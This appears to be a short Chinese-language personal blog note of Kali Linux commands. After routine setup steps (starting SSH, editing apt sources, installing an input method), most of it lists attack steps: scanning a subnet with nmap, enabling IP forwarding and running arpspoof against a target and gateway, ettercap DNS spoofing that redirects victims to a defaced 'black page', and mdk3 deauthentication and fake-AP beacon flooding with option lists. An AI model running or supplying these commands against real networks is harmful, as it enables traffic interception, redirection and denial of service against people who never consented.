kali 折腾记录

ssh:/etc/init.d/ssh start #start ssh then logout 开启SSH

leafpad /etc/apt/source.list //修改kali 更新源


apt-get update //更新
apt-get dist-upgrade //安装更新

apt-get install fcitx fcitx-googlepinyin //安装中文输入法


nmap -sP 192.168.0.0/24 //查找网段类存活主机

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i etho -i 192.168.1.100 192.168.1.1 //第一个IP是目标IP 第二个是网关IP

修改ettercap DNS文件。
文件目录:/etc/ettercap/etter.dns
用记事本打开它。
ctrl+f 搜索
关键字:# redirect it to http://www.linux.org

在终端输入/etc/init.d/apache2 start 
来启动apache2 也就是网页服务器
apache2的根目录是/var/www 修改一下index.html 改成黑页

在终端输入ettercap -G来进入ettercap的图形界面

//无线wifi相关

Image [1].png

airmon-ng start wlan0 
airodump-ng mon0 //获取wifi

//无线攻击 mdk3

mdk3 mon0 d
      -w <filename>             #白名单mac地址列表文件
      -b <filename>              #黑名单mac地址列表文件
      -s <pps>                        #速率,这个模式下默认无限制
      -c [chan,chan,chan,...]                  #信道,可以多填,如 2,4,5,1


方法三:伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋
mdk3 mon0 b
      -n <ssid>        #自定义ESSID
      -f <filename>            #读取ESSID列表文件
      -v <filename>           #自定义ESSID和BSSID对应列表文件
      -d       #自定义为Ad-Hoc模式
      -w         #自定义为wep模式
     -g        #54Mbit模式
     -t   # WPA TKIP encryption
     -a #WPA AES encryption
      -m #读取数据库的mac地址
      -c <chan> #自定义信道
      -s <pps> #发包速率
mdk3 –help b #查看详细内容

发表评论 / Comment

用心评论~